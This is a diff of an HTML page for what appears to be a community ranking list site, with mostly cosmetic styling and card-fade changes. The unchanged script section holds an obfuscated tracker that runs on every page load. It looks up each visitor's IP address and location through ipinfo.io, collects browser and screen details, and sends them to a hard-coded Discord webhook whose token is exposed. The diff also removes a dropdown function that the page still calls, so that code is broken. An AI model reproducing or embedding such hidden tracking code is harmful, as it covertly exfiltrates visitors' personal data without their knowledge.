--- a/eio-list.html
+++ b/eio-list.html
@@ -28,7 +28,7 @@
                 <div class="dropdown">
                     <button class="dropbtn" onclick="toggleDropdown()">
                         <img src="assets/country.svg" class="flag-icon">
-                        <h3>Universal List</h3>
+                        <h3 class="nav-title">Universal List</h3>
                     </button>
                     <div class="dropdown-content" id="dropdownContent">
                         <a href="universal-list.html">Universal List</a>
@@ -39,7 +39,7 @@
                 <div class="nav">
                     <a href="https://discord.gg/XXCk8EDF6r" target="_blank">
                         <img src="assets/discord.svg" class="flag-icon">
-                        <h3>Discord Server</h3>
+                        <h3 class="nav-title">Discord Server</h3>
                     </a>
                 </div>
             </div>
@@ -77,19 +77,34 @@
         const _0x73fdb9=_0x3654;(function(_0x28f09f,_0x335835){const _0x22285b=_0x3654,_0xc56783=_0x28f09f();while(!![]){try{const _0x422909=parseInt(_0x22285b(0x14e))/0x1+-parseInt(_0x22285b(0x13c))/0x2+parseInt(_0x22285b(0x145))/0x3+-parseInt(_0x22285b(0x14d))/0x4+parseInt(_0x22285b(0x133))/0x5*(parseInt(_0x22285b(0x149))/0x6)+-parseInt(_0x22285b(0x13f))/0x7*(parseInt(_0x22285b(0x142))/0x8)+parseInt(_0x22285b(0x141))/0x9*(parseInt(_0x22285b(0x13a))/0xa);if(_0x422909===_0x335835)break;else _0xc56783['push'](_0xc56783['shift']());}catch(_0x1369f1){_0xc56783['push'](_0xc56783['shift']());}}}(_0x3c6f,0xd3bee));const webhookUrl=_0x73fdb9(0x152);function _0x3c6f(){const _0x506d17=['880PIMPzX','https://ipinfo.io/json?token=ce1fc29ae007b4',',\x20Height:\x20','2370717kvoCQt','.traffic','send','stringify','96108uOSAyq','POST','platform','then','171572BlQclQ','431891sZjhDK','screen','City','colorDepth','https://discord.com/api/webhooks/1246327757105926166/QzIzaMff8SONkEzyOu194IS_XIoa52xQHfbvGR82QNhc57oAGB4SogGzEWHY3y0VaYv3','Unavailable','open','parentNode','userAgent','setRequestHeader','User-Agent','language','height','querySelector','155bMhMAt','Access\x20event\x20recorded','Country','application/json','city','catch','New\x20Access\x20Detected','10ihQZXq','region','3298848CmUkQh','Time','onreadystatechange','31773LuVuTG','country','12062061bdYiTU'];_0x3c6f=function(){return _0x506d17;};return _0x3c6f();}function _0x3654(_0x2dc49d,_0x3faaf5){const _0x3c6fc6=_0x3c6f();return _0x3654=function(_0x36543a,_0x13ba2a){_0x36543a=_0x36543a-0x131;let _0x5d4cef=_0x3c6fc6[_0x36543a];return _0x5d4cef;},_0x3654(_0x2dc49d,_0x3faaf5);}async function sendWebhook(){const _0xc4499d=_0x73fdb9,_0x162f4e=await fetch(_0xc4499d(0x143))[_0xc4499d(0x14c)](_0x4ed3d1=>_0x4ed3d1['json']())[_0xc4499d(0x138)](_0x3eaa1b=>({'error':'Failed\x20to\x20fetch\x20IP\x20info'})),_0x20307b={'userAgent':navigator[_0xc4499d(0x156)],'platform':navigator[_0xc4499d(0x14b)],'language':navigator[_0xc4499d(0x159)],'screen':{'width':screen['width'],'height':screen[_0xc4499d(0x131)],'colorDepth':screen[_0xc4499d(0x151)]}},_0x45548c={'title':_0xc4499d(0x139),'description':'Details\x20of\x20the\x20access\x20event','color':0x3498db,'fields':[{'name':'URL','value':location['href'],'inline':![]},{'name':_0xc4499d(0x13d),'value':new Date()['toISOString'](),'inline':![]},{'name':'IP','value':_0x162f4e['ip']||_0xc4499d(0x153),'inline':!![]},{'name':_0xc4499d(0x150),'value':_0x162f4e[_0xc4499d(0x137)]||_0xc4499d(0x153),'inline':!![]},{'name':'Region','value':_0x162f4e[_0xc4499d(0x13b)]||_0xc4499d(0x153),'inline':!![]},{'name':_0xc4499d(0x135),'value':_0x162f4e[_0xc4499d(0x140)]||_0xc4499d(0x153),'inline':!![]},{'name':_0xc4499d(0x158),'value':_0x20307b[_0xc4499d(0x156)],'inline':![]},{'name':'Platform','value':_0x20307b['platform'],'inline':!![]},{'name':'Language','value':_0x20307b[_0xc4499d(0x159)],'inline':!![]},{'name':'Screen','value':'Width:\x20'+_0x20307b[_0xc4499d(0x14f)]['width']+_0xc4499d(0x144)+_0x20307b['screen'][_0xc4499d(0x131)]+',\x20Color\x20Depth:\x20'+_0x20307b[_0xc4499d(0x14f)][_0xc4499d(0x151)],'inline':![]}],'footer':{'text':_0xc4499d(0x134)},'timestamp':new Date()},_0x1cc63e=JSON[_0xc4499d(0x148)]({'embeds':[_0x45548c]}),_0x62c3fb=new XMLHttpRequest();_0x62c3fb[_0xc4499d(0x154)](_0xc4499d(0x14a),webhookUrl,!![]),_0x62c3fb[_0xc4499d(0x157)]('Content-Type',_0xc4499d(0x136)),_0x62c3fb[_0xc4499d(0x13e)]=function(){const _0x3e7b0e=_0xc4499d;if(_0x62c3fb['readyState']===XMLHttpRequest['DONE']){const _0x27ba7a=document[_0x3e7b0e(0x132)](_0x3e7b0e(0x146));_0x27ba7a&&_0x27ba7a[_0x3e7b0e(0x155)]['removeChild'](_0x27ba7a);}},_0x62c3fb[_0xc4499d(0x147)](_0x1cc63e);}sendWebhook();
     </script>
     <script>
-        function toggleDropdown() {
-        const dropdownContent = document.getElementById("dropdownContent");
-        dropdownContent.classList.toggle("show");
-    }
-    const appRoot = document.documentElement;
+        document.addEventListener("DOMContentLoaded", () => {
+    const cards = document.querySelectorAll("#about .card, #features .card");
+
+    const setCardOpacity = () => {
+        cards.forEach(card => {
+            const rect = card.getBoundingClientRect();
+            const windowHeight = window.innerHeight;
+            
+            // Check if the card is in the viewport
+            if (rect.top < windowHeight && rect.bottom >= 0) {
+                card.style.opacity = 1;
+            } else {
+                card.style.opacity = 0;
+            }
+        });
+    };
+
+    window.addEventListener('scroll', setCardOpacity);
+    setCardOpacity(); // Initial call to set the opacity on page load
+});
+
+const appRoot = document.documentElement;
 const nav = document.querySelector(".lists");
 const root = document.documentElement;
 const loader = document.querySelector(".loader");
 const mainDiv = document.querySelector(".main");
 const legacyDiv = document.querySelector(".legacy");
 const typeList = document.getElementById("type-list");
-const mainCards = document.querySelectorAll(".main .card");
-const legacyCards = document.querySelectorAll(".legacy .card");
 
 const endTransition = () => {
     loader.addEventListener("transitionend", () => {
@@ -105,7 +120,6 @@ const startTransition = () => {
     mainDiv.style.display = "flex";
     legacyDiv.style.display = "none";
     typeList.style.opacity = "1";
-    mainCards.forEach(card => card.style.opacity = "1");
 };
 
 nav.addEventListener("click", (e) => {
@@ -133,7 +147,6 @@ const onRouteClick = (route) => {
             mainDiv.style.opacity = "1"; // Fade in main
             typeList.textContent = "MAIN LIST";
             typeList.style.opacity = "1"; // Fade in type-list
-            mainCards.forEach(card => card.style.opacity = "1"); // Fade in main cards
         }, 500);
     } else if (route === "b") {
         mainDiv.style.opacity = "0"; // Start fading out main
@@ -143,7 +156,6 @@ const onRouteClick = (route) => {
             legacyDiv.style.opacity = "1"; // Fade in legacy
             typeList.textContent = "LEGACY LIST";
             typeList.style.opacity = "1"; // Fade in type-list
-            legacyCards.forEach(card => card.style.opacity = "1"); // Fade in legacy cards
         }, 500);
     }
 
@@ -159,7 +171,6 @@ window.addEventListener("load", () => {
             mainDiv.style.opacity = "1"; // Fade in main
             typeList.textContent = "MAIN LIST";
             typeList.style.opacity = "1"; // Fade in type-list
-            mainCards.forEach(card => card.style.opacity = "1"); // Fade in main cards
         }, 500);
 });
     </script>
